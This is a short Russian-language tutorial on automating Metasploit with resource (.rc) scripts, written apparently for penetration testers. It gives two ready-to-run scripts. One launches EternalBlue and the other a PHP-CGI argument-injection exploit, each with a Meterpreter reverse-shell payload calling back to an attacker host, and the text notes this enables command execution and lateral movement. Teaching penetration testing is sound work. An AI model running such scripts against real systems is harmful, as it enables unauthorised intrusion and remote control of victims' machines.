Мы уже рассказывали про как пользоваться Metasploit. Сегодня продолжим изучать фреймворк и поговорим об автоматизации Metasploit, которая упрощает процесс тестирования на проникновение, автоматизируя выполнение модулей, команд и эксплойтов. Такой эффективный подход, достигаемый с помощью скриптов, значительно сокращает объем работ, выполняемых вручную, ускоряет выявление уязвимостей и улучшает процесс эксплуатации.
Еще по теме: Сравнение C&C Metasploit с альтернативой Havoc
Автоматизация Metasploit
Автоматизация может быть реализована с помощью скриптовых языков, таких как Ruby или Python, с использованием файла ресурсов (.rc).
Ресурсный скрипт Metasploit, обычно с расширением .rc, содержит необходимые команды и параметры для выполнения модуля. Для выполнения этих скриптов из командной строки используется команда
1 |
msfconsole -r |
Ниже приведены два примера автоматизации Metasploit.
Пример .rc файла может выглядеть примерно так:
1 2 3 4 5 |
use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.1.100 set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 192.168.1.2 exploit |
Этот файл запускает эксплойт для уязвимости EternalBlue, указывает целевой хост (RHOSTS), тип обратного соединения (PAYLOAD), и IP-адрес, на который будет установлено соединение (LHOST). После выполнения .rc файла запуститься Metasploit и автоматически выполнит эти команды (подробнее об этих командах см. в статье Что означает LHOST RHOST Metasploit).
Вот еще один пример использования файла .rc.
1 2 3 4 5 6 7 |
use use exploit/multi/http/php_cgi_arg_injection set RHOSTS 192.168.149.129 set RPORT 80 set payload php/meterpreter_reverse_tcp set LHOST 192.168.149.128 set LPORT 4444 exploit |
Сохраните скрипт в формате имя_файла.rc и поместите его в каталог.
Запустите скрипт:
1 |
msfconsole -r [имя_файла_и_путь] |
После запуска фреймворка Metasploit он начинает последовательно считывать и выполнять команды из файла, создавая реверс-шелл Meterpreter. Это позволяет выполнять команды и осуществлять боковое перемещение.
Заключение
Использование скриптового языка Metasploit и файлов .rc для автоматизации общих задач дает множество преимуществ, включая экономию времени и уменьшение количества ошибок.
ПОЛЕЗНЫЕ ССЫЛКИ: